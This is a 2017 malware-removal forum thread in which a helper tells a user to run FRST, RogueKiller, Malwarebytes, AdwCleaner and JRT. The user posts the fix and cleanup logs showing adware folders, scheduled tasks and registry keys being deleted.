Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:26.641
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:26.451
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:21.602
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:21.574
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:21.526
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:20.862
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

Processor: AMD A6-4400M APU with Radeon(tm) HD Graphics
Percentage of memory in use: 68%
Total physical RAM: 3561.36 MB
Available physical RAM: 1133.93 MB
Total Virtual: 7145.36 MB
Available Virtual: 4381.24 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:445.3 GB) (Free:394.77 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Recovery) (Fixed) (Total:20.16 GB) (Free:2.14 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (86489) (CDROM) (Total:7.39 GB) (Free:0 GB) UDF

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 915B52F3)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=445.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=20.2 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=103 MB) - (Type=0C)

==================== End of Addition.txt ============================
 
Please observe the following rules:
  • Read all of my instructions very carefully. Your mistakes during the cleaning process may have very serious consequences, like an unbootable computer.
  • If you're stuck, or you're not sure about a certain step, always ask before doing anything else.
  • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
  • Never run more than one scan at a time.
  • Keep updating me regarding your computer's behavior, good or bad.
  • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
  • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in the malware removal forum.
  • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.

===========================================

Download attached fixlist.txt file and save it to the Desktop.
NOTE: It's important that both files, FRST and fixlist.txt, are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST(FRST64) and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

When done with the above, uninstall the following unwanted programs:

Download Updater
FromDocToPDF Internet Explorer Homepage and New Tab
Itibiti RTC
NowUSeeIt Player
RegCure Pro

Next....

Download RogueKiller from one of the following links and save it to your Desktop:

Link 1
Link 2
  • Close all the running programs
  • Double click on downloaded setup.exe file to install the program.
  • Click on Start Scan button.
  • Click on another Start Scan button.
  • Wait until the Status box shows Scan Finished
  • Click on Delete.
  • Wait until the Status box shows Deleting Finished.
  • Click on Report and copy/paste the content of the Notepad into your next reply.
  • RKreport.txt could also be found on your desktop.
  • If more than one log is produced post all logs.
Please download Malwarebytes to your desktop.
  • Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
  • Then click Finish.
  • Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
  • If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
  • When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
  • Restart your computer when prompted to do so.
  • The Scan log is available through History -> Application logs. Please post its contents in your next reply.
Please download AdwCleaner by Xplode and save to your Desktop.
  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator
  • The tool will start to update the database if one is required.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Logfile button.
  • A window will open which lists the logs of your scans.
  • Click on the Scan tab.
  • Double-click the most recent scan which will be at the top of the list....the log will appear.
  • Review the results...see note below
  • After reviewing the log, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
  • To open a Cleaning log, launch AdwCleaner, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
  • Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
  • A copy of all logfiles is saved to C:\AdwCleaner.
-- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.


Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista or Seven, right-mouse click it and select Run as Administrator.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
 

Attachments

  • fixlist.txt
fixlistlog:

Fix result of Farbar Recovery Scan Tool (x64) Version: 10-02-2017
Ran by Randy (11-02-2017 14:40:32) Run:1
Running from C:\Users\Randy\Desktop\Virus
Loaded Profiles: Randy (Available Profiles: Randy & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden <==== ATTENTION
*****************

HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{730E03E4-350E-48E5-9D3E-4329903D454D}\\SystemComponent => value removed successfully

==== End of Fixlog 14:40:32 ====
 
Problem with installing RogueKiller: Setup was unable to create the directory c:\rANDY\APPDATA\LOCAL\TEMP\IS-7ALMS.tmp
Error 5: Access is denied.

Move on to Malware?
 
Similar problem:
Problem with installing RogueKiller: Setup was unable to create the directory c:\rANDY\APPDATA\LOCAL\TEMP\IS-EVF9C.tmp
Error 5: Access is denied.
Now what? After working with you for 10 years, this is the first time I've had this problem. I've told my brother-in-law over and over not to load any program or thing when it pops up. No clicking update drivers, yet this. Thanks for the help.
 
Made some progress with adaware:

# AdwCleaner v6.043 - Logfile created 11/02/2017 at 18:11:15
# Updated on 27/01/2017 by Malwarebytes
# Database : 2017-02-09.1 [Local]
# Operating System : Windows 10 Home (X64)
# Username : Randy - HP-RRR
# Running from : C:\Users\Randy\Favorites\Downloads\AdwCleaner.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****

[-] Service deleted: sbmntr
[-] Service deleted: swdumon
[-] Service deleted: SlimService


***** [ Folders ] *****

[-] Folder deleted: C:\ProgramData\261dc3b1
[-] Folder deleted: C:\ProgramData\36f86f45-1b77-1
[-] Folder deleted: C:\ProgramData\36f86f45-7e55-0
[-] Folder deleted: C:\ProgramData\ee6dbd75-5221-0
[-] Folder deleted: C:\ProgramData\ee6dbd75-5bb7-0
[-] Folder deleted: C:\ProgramData\ee6dbd75-5bc1-0
[-] Folder deleted: C:\ProgramData\ee6dbd75-63b7-1
[-] Folder deleted: C:\ProgramData\f80ff131-0b33-1
[-] Folder deleted: C:\ProgramData\f80ff131-23f3-0
[-] Folder deleted: C:\ProgramData\Service1291
[-] Folder deleted: C:\ProgramData\{00f0021e-112c-1}
[-] Folder deleted: C:\ProgramData\{01fe41a9-412c-0}
[-] Folder deleted: C:\ProgramData\{0ccc5bd4-712c-1}
[-] Folder deleted: C:\ProgramData\{0d6ade3e-112c-1}
[-] Folder deleted: C:\ProgramData\{18e52712-012c-0}
[-] Folder deleted: C:\ProgramData\{2ed2530e-412c-0}
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverUpdate
[-] Folder deleted: C:\Program Files (x86)\DriverUpdate
[-] Folder deleted: C:\Users\Public\Documents\Downloaded Installers\{75881A1F-A02E-4D88-BCFA-34D86752A0C3}
[-] Folder deleted: C:\WINDOWS\Installer\{75881A1F-A02E-4D88-BCFA-34D86752A0C3}
[-] Folder deleted: C:\Users\Randy\AppData\Local\BrowserHelper
[-] Folder deleted: C:\Users\Randy\AppData\Local\globalUpdate
[-] Folder deleted: C:\Users\Randy\AppData\Local\Professional_Cleaning_Sof
[-] Folder deleted: C:\Users\Randy\AppData\Local\slimware utilities inc
[-] Folder deleted: C:\Users\Randy\AppData\Local\TNT2
[-] Folder deleted: C:\Users\Randy\AppData\Local\TVTime
[-] Folder deleted: C:\Users\Randy\AppData\Local\Downloaded Installers
[-] Folder deleted: C:\Users\Randy\AppData\Local\NowUSeeItPlayer
[-] Folder deleted: C:\Users\Randy\AppData\Local\SlimWare Utilities Inc
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\ParetoLogic
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\Store
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\WTools
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\TelevisionFanatic
[#] Folder deleted on reboot: C:\Users\Randy\AppData\Roaming\PARETOLOGIC
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Driver Detective
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YTDownloader
[-] Folder deleted: C:\Users\Randy\Documents\ProfessionalCleaningSoftware
[-] Folder deleted: C:\Program Files\Earth Networks
[-] Folder deleted: C:\Program Files\slimcleaner plus
[-] Folder deleted: C:\Program Files\slimservice
[-] Folder deleted: C:\Program Files\TotalSystemCare
[#] Folder deleted on reboot: C:\Program Files\SlimCleaner Plus
[#] Folder deleted on reboot: C:\Program Files\SlimService
[-] Folder deleted: C:\ProgramData\ByteFence
[-] Folder deleted: C:\ProgramData\ParetoLogic
[-] Folder deleted: C:\ProgramData\slimware utilities inc
[-] Folder deleted: C:\ProgramData\speedypc software
[-] Folder deleted: C:\ProgramData\Viewpoint
[#] Folder deleted on reboot: C:\ProgramData\SpeedyPC Software
[#] Folder deleted on reboot: C:\ProgramData\SlimWare Utilities Inc
[#] Folder deleted on reboot: C:\ProgramData\PARETOLOGIC
[#] Folder deleted on reboot: C:\ProgramData\Application Data\ByteFence
[#] Folder deleted on reboot: C:\ProgramData\Application Data\ParetoLogic
[#] Folder deleted on reboot: C:\ProgramData\Application Data\slimware utilities inc
[#] Folder deleted on reboot: C:\ProgramData\Application Data\speedypc software
[#] Folder deleted on reboot: C:\ProgramData\Application Data\Viewpoint
[#] Folder deleted on reboot: C:\ProgramData\Application Data\SpeedyPC Software
[#] Folder deleted on reboot: C:\ProgramData\Application Data\SlimWare Utilities Inc
[#] Folder deleted on reboot: C:\ProgramData\Application Data\PARETOLOGIC
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverRestore
[#] Folder deleted on reboot: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\driverupdate
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\slimcleaner plus
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\speedypc software
[#] Folder deleted on reboot: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SpeedyPC Software
[#] Folder deleted on reboot: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SlimCleaner Plus
[#] Folder deleted on reboot: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverUpdate
[-] Folder deleted: C:\Users\Public\Documents\Downloaded Installers
[-] Folder deleted: C:\Program Files (x86)\Driver Detective
[-] Folder deleted: C:\Program Files (x86)\DriverRestore
[#] Folder deleted on reboot: C:\Program Files (x86)\driverupdate
[-] Folder deleted: C:\Program Files (x86)\globalUpdate
[-] Folder deleted: C:\Program Files (x86)\jZip
[#] Folder deleted on reboot: C:\Program Files (x86)\speedypc software
[-] Folder deleted: C:\Program Files (x86)\Viewpoint
[-] Folder deleted: C:\Program Files (x86)\YTDownloader
[-] Folder deleted: C:\Program Files (x86)\NowUSeeItPlayer
[#] Folder deleted on reboot: C:\Program Files (x86)\SpeedyPC Software
[-] Folder deleted: C:\Program Files (x86)\PRO PC Cleaner
[#] Folder deleted on reboot: C:\Program Files (x86)\DriverUpdate
[-] Folder deleted: C:\Program Files (x86)\iolo\System Checkup
[-] Folder deleted: C:\Program Files (x86)\Common Files\speedypc software
[#] Folder deleted on reboot: C:\Program Files (x86)\Common Files\SpeedyPC Software
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\updates
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1}
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\extensions\staged\{635abd67-4fe9-1b23-4f01-e679fa7484c1}
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\extensions\videoresumer@jetpack
[-] Folder deleted: C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\kofkpgiaknijknhajbhnghkodiccblkg


***** [ Files ] *****

[-] File deleted: C:\Users\Randy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jZip.lnk
[-] File deleted: C:\Users\Randy\Desktop\YTDownloader.lnk
[-] File deleted: C:\WINDOWS\SysNative\drivers\swdumon.sys
[-] File deleted: C:\END
[-] File deleted: C:\Users\Public\Desktop\DriverRestore.lnk
[-] File deleted: C:\Users\Public\Desktop\slimcleaner plus.lnk
[-] File deleted: C:\Users\Public\Desktop\driverupdate.lnk
[#] File deleted: C:\Users\Public\Desktop\SlimCleaner Plus.lnk
[-] File deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.html.lnk
[-] File deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\extensions\staged\{635abd67-4fe9-1b23-4f01-e679fa7484c1}.json
[-] File deleted: C:\Program Files (x86)\Mozilla Firefox\cfg
[-] File deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\searchplugins\Search Provided by Yahoo.xml
[#] File deleted: C:\Program Files (x86)\Mozilla Firefox\cfg
[#] File deleted: C:\Program Files (x86)\Mozilla Firefox\cfg
[-] File deleted: C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_kofkpgiaknijknhajbhnghkodiccblkg_0.localstorage


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****

[-] Task deleted: CRWKRUVUBYBCAXNB
[-] Task deleted: Nubopo
[-] Task deleted: SlimCleaner Plus (Scheduled Scan - Randy)
[-] Task deleted: {090C7947-7904-0E0F-0A11-0B7E7F79117F}
[-] Task deleted: CRWKRUVUBYBCAXNB
[-] Task deleted: DriverRestore_DailyScan
[-] Task deleted: DriverRestore_ScheduledScan
[-] Task deleted: SpeedyPC Update Version3
[-] Task deleted: YTDownloader
[-] Task deleted: YTDownloaderUpd
[-] Task deleted: LaunchPreSignup
[-] Task deleted: ProfessionalCleaningSoftware_Start
[-] Task deleted: DriverUpdate Scan
[-] Task deleted: DriverUpdate Startup


***** [ Registry ] *****

[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverUpdate
[#] Key deleted on reboot: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverUpdate_is1
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75881A1F-A02E-4D88-BCFA-34D86752A0C3}
[#] Key deleted on reboot: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75881A1F-A02E-4D88-BCFA-34D86752A0C3}_is1
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\NETTCPHANDLER
[#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\NETTCPHANDLER
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\sys_service
[#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\sys_service
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Classes\ShopAtHomeHelper.CookiesManager
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Classes\ShopAtHomeHelper.CookiesManager.1
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Classes\ShopAtHomeHelper.hxxpHandle302
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Classes\ShopAtHomeHelper.hxxpHandle302.1
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Classes\ShopAtHomeHelper.PostUrlWorker
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Classes\ShopAtHomeHelper.PostUrlWorker.1
[#] Key deleted on reboot: HKCU\Software\Classes\ShopAtHomeHelper.CookiesManager
[#] Key deleted on reboot: HKCU\Software\Classes\ShopAtHomeHelper.CookiesManager.1
[#] Key deleted on reboot: HKCU\Software\Classes\ShopAtHomeHelper.hxxpHandle302
[#] Key deleted on reboot: HKCU\Software\Classes\ShopAtHomeHelper.hxxpHandle302.1
[#] Key deleted on reboot: HKCU\Software\Classes\ShopAtHomeHelper.PostUrlWorker
[#] Key deleted on reboot: HKCU\Software\Classes\ShopAtHomeHelper.PostUrlWorker.1
[-] Key deleted: HKLM\SOFTWARE\Classes\AniGIFCtrl.AniGIF
[-] Key deleted: HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg
[-] Key deleted: HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg.1
[-] Key deleted: HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2
[-] Key deleted: HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2.1
[-] Key deleted: HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtl
[-] Key deleted: HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtl.1
[-] Key deleted: HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtlSecondary
[-] Key deleted: HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtlSecondary.1
[-] Key deleted: HKLM\SOFTWARE\Classes\CRSBRWSHTML
[-] Key deleted: HKLM\SOFTWARE\Classes\uus3url-spc
[-] Key deleted: HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar
[-] Key deleted: HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar.1
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\ShopAtHomeHelper.CookiesManager
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\ShopAtHomeHelper.CookiesManager.1
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\ShopAtHomeHelper.hxxpHandle302
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\ShopAtHomeHelper.hxxpHandle302.1
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\ShopAtHomeHelper.PostUrlWorker
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\ShopAtHomeHelper.PostUrlWorker.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AniGIFCtrl.AniGIF
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtl
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtl.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtlSecondary
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtlSecondary.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\CRSBRWSHTML
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\uus3url-spc
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar.1
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Classes\TypeLib\{B944FF5E-EC87-4E1E-8C49-2FF3BC573997}
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{7375D127-3955-4654-8E7D-1949A7A9C902}
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{1BD47D21-01F4-4538-9290-39FD569A0F24}
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{149622B2-F1C5-492D-BFDF-8E5ED85854A0}
[-] Key deleted: HKCU\Software\Classes\CLSID\{D565B35E-B787-40FA-95E3-E3562F8FC1A0}
[-] Key deleted: HKCU\Software\Classes\CLSID\{08613A51-6E3E-43CC-9ECF-DD58B5837341}
[-] Key deleted: HKCU\Software\Classes\CLSID\{153EDC41-A2CC-4BEB-9EC8-008242389E50}
[-] Key deleted: HKCU\Software\Classes\CLSID\{188028B8-D91D-4BE2-BABA-68E32BDE4420}
[-] Key deleted: HKCU\Software\Classes\CLSID\{28E74F15-18C2-465E-B545-6CC738121C68}
[-] Key deleted: HKCU\Software\Classes\CLSID\{2BF6042B-B9B1-46D9-A3F8-9C987FADD4C6}
[-] Key deleted: HKCU\Software\Classes\CLSID\{40A222E2-93B1-45F9-9B07-0D1160A31A6C}
[-] Key deleted: HKCU\Software\Classes\CLSID\{6325A84C-E746-4007-A9C5-E4C1A50ED61F}
[-] Key deleted: HKCU\Software\Classes\CLSID\{9BCA87A0-5B8F-4500-A5AF-EA1279714FDF}
[-] Key deleted: HKCU\Software\Classes\CLSID\{BB17DE65-B548-48C2-AC73-1FD1996C7261}
[-] Key deleted: HKCU\Software\Classes\CLSID\{C77D3EEF-FDCA-4D37-B0D2-5FF650E07825}
[-] Key deleted: HKCU\Software\Classes\CLSID\{EA70EB31-CBAD-4862-AFDA-DCFCC32722ED}
[-] Key deleted: HKCU\Software\Classes\CLSID\{EC9100F8-5918-4F1B-9CC1-4D34A64E0FE0}
[-] Key deleted: HKCU\Software\Classes\CLSID\{F1A1ABE3-F454-4DD9-B520-01F2EEC5F0DD}
[-] Key deleted: HKCU\Software\Classes\CLSID\{17EF1FFB-0545-4C9A-BE64-78FF53338475}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{03F998B2-0E00-11D3-A498-00104B6EB52E}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{1B00725B-C455-4DE6-BFB6-AD540AD427CD}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{F56ACA29-1C99-40F1-AC64-2E44C4F6BC71}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{12D3E096-0FDF-42CC-8F44-04944F9C1648}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{22389F39-2CF4-47C4-B8B2-273BB16BF70C}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{23E3CEB3-D63A-433E-A5D0-4DB1C501B915}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{26A3152F-CF87-4C5B-8093-4D4B9EC084EB}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{29E3319C-4B3C-479F-8692-BDD2CA30BEDD}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{367BD1CD-74A3-451F-B1A4-6A2DE4129A2D}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{49F018EE-F362-4B5B-8EC8-BCF9246ABF21}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{63B73044-FC1A-4FE1-991B-FDBD4CDAA868}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{7207E52B-821E-4C05-A8D6-2965B2BE77CF}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{863FCF5D-DC39-4DA9-AF32-CB0025990EEE}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{B09E015A-4D4E-4F8D-A436-95E19140947D}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{B1E712C4-03AA-495F-B0F5-0F057E126E2A}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{D13DC65C-C77B-4986-9078-DEA3D34C71BB}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{371AD4A5-1520-4AA2-A8A4-F9AD3BAC6957}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{7F124846-5453-4BB8-A41D-E11481FFC9DF}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{8FD65019-BF09-45DA-AD81-E95AE911F1FD}
[#] Key deleted on reboot: HKCU\Software\Classes\TypeLib\{B944FF5E-EC87-4E1E-8C49-2FF3BC573997}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{A5FF3EB5-BF62-4D59-84DF-DC518E46FCB3}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{38122A36-83B2-46B8-B39A-EC72A4614A07}
[-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{79F768ED-0B12-42EF-8257-36751A0ECF3A}]
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\DAILYPCCLEAN
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\DriverRestore
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\eSupport.com
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\GlobalUpdate
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Tinstalls
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\ParetoLogic
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\powerpack
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\PRODUCTSETUP
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\ProfessionalCleaningSoftwareLanguage
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\SlimWare Utilities Inc
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\speedypc software
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Store
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\TNT2
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\tstamptoken
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\WTools
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Yahoo\Companion
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Yahoo\YFriendsBar
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\NowUSeeItPlayer
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\INSTALLPATH\STATUS
